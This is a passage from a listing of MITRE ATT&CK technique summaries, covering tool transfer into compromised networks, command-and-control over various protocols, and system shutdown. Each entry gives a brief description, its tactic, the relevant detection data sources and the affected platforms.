Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre